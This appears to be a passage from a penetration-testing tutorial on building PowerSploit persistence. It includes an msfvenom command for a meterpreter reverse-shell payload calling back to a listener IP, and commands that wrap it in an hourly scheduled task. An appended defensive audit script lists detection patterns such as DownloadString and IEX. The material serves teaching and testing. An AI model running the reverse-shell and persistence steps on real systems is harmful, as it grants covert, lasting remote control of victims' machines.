Configuring and executing meterpreter persistence

Now we're ready to build our gift to the world. First, we need to understand how these three scripts work. They're not individual tools that you pick and choose from as needed; they are all one tool. To create any persistent script, you'll need to run all three in a particular order:

  • New-UserPersistenceOption and New-ElevatedPersistenceOption must be executed first. The order doesn't matter as long as it's before the final script, Add-Persistence. These two scripts are used to define the persistence specifics that will make it into the final product. Why two? Because you're telling your payload how to handle being either a standard user or a privileged user. Perhaps you want to configure these settings differently depending on if an administrator runs it or not. For now, we'll just make the settings the same for both.
  • Add-Persistence needs the configuration defined in the first two scripts. These are passed to Add-Persistence as PowerShell variables of your choosing.

Clear as mud? Let's dive in. First, we need a payload. What's nice about this is that any ol' PowerShell script will do fine. Maybe you have a favorite from our earlier review of PowerShell. Perhaps you typed up your own. For now, we'll generate an example with the ever-useful msfvenom. One of the format options is PowerShell!

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.154.131 LPORT=8008 -f psh > attack.ps1

Get that script to your script builder system (I used SimpleHTTPServer again; I just love that thing). Don't take it to your target; we don't have our persistent script just yet.

If you only have access to one Windows 7 box, your script builder and target are the same system.

Now we run the three scripts: the two option scripts with their output stored in PowerShell variables, and then the persistence script with those options pulled in and the payload script defined:

> $userop = New-UserPersistenceOption -ScheduledTask -Hourly
> $suop = New-ElevatedPersistenceOption -ScheduledTask -Hourly
> Add-Persistence -FilePath .\attack.ps1 -ElevatedPersistenceOption $suop -UserPersistenceOption $userop

You can run ls or dir when you're done to verify that it worked. You should see two new scripts: Persistence.ps1 and RemovePersistence.ps1. The latter is for cleaning up your mess, should you need it. This will be important in a pen test, so don't lose that file! Get Persistence.ps1 over to your target.
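What Persistence.ps1 leaves on the target with the options chosen above is a scheduled task that re-launches PowerShell every hour, and that is exactly what a defender (or a tester checking that RemovePersistence.ps1 really cleaned up) should be able to find. The following is an added example, not code from the book or from PowerSploit: a PowerShell audit that reads every scheduled task definition on the host, keeps only the actions that launch powershell.exe or pwsh.exe, and reports the launch flags, trigger types and repetition interval. It assumes that task definitions are stored as XML files under %WINDIR%\System32\Tasks (true on Windows 7 and later) and that it runs from an elevated prompt, since that folder is not readable by standard users. The list of suspicious argument patterns is an assumption for illustration, not a signature of any one tool.

```powershell
# Added example (not from the book or PowerSploit): audit scheduled tasks whose action
# launches PowerShell and report the flags and triggers that usually accompany
# script-based persistence. Assumes the task XML files under %WINDIR%\System32\Tasks are
# readable, i.e. the script runs from an elevated prompt.
param(
    [string]$TaskRoot = (Join-Path $env:windir 'System32\Tasks')
)

# Launch flags and snippets worth a second look in a task's Arguments element.
# This list is an assumption for illustration, not a signature of any one tool.
$SuspiciousArgumentPatterns = @(
    '-EncodedCommand', '-enc\b', '-WindowStyle\s+Hidden', '-NonInteractive',
    '-NoProfile', '-ExecutionPolicy\s+Bypass', 'IEX', 'Invoke-Expression', 'DownloadString'
)

function Get-PowerShellTaskFindings {
    param([string]$Root)

    $Root = (Resolve-Path -Path $Root).ProviderPath
    $ns = @{ t = 'http://schemas.microsoft.com/windows/2004/02/mit/task' }

    Get-ChildItem -Path $Root -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
        $file = $_
        try {
            [xml]$task = Get-Content -Path $file.FullName -Raw -ErrorAction Stop
        } catch {
            return   # unreadable or non-XML entry; skip it
        }

        foreach ($exec in (Select-Xml -Xml $task -XPath '//t:Actions/t:Exec' -Namespace $ns)) {
            $command   = ([string]$exec.Node.Command).Trim('"')
            $arguments = [string]$exec.Node.Arguments

            # Only actions whose executable is powershell.exe or pwsh.exe are of interest here.
            if ($command -notmatch '(?i)(^|\\)(powershell|pwsh)(\.exe)?$') { continue }

            $flags = $SuspiciousArgumentPatterns | Where-Object { $arguments -match "(?i)$_" }

            # Trigger element names (CalendarTrigger, TimeTrigger, LogonTrigger, IdleTrigger, ...)
            # and any repetition interval, e.g. PT1H for a task that re-runs every hour.
            $triggers = Select-Xml -Xml $task -XPath '//t:Triggers/*' -Namespace $ns |
                ForEach-Object { $_.Node.LocalName }
            $interval = Select-Xml -Xml $task -XPath '//t:Repetition/t:Interval' -Namespace $ns |
                Select-Object -First 1 | ForEach-Object { $_.Node.InnerText }

            [pscustomobject]@{
                Task      = $file.FullName.Substring($Root.Length)
                Command   = $command
                Arguments = $arguments
                Flags     = ($flags -join ', ')
                Triggers  = ($triggers -join ', ')
                Interval  = $interval
            }
        }
    }
}

# Tasks carrying the most suspicious flags float to the top of the report.
Get-PowerShellTaskFindings -Root $TaskRoot |
    Sort-Object { $_.Flags.Length } -Descending |
    Format-Table -AutoSize -Wrap
```

Run it on the target before Persistence.ps1, again afterwards, and once more after RemovePersistence.ps1: the hourly PowerShell task should appear in the second run and be gone in the third. Reading the XML files directly is deliberate, because the Get-ScheduledTask cmdlet only arrived with Windows 8 and Server 2012 and is not available on the Windows 7 box used in this chapter. Where task-creation auditing is enabled, the same installation also shows up in the Security log as event ID 4698 (a scheduled task was created), which gives a second, independent place to look.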
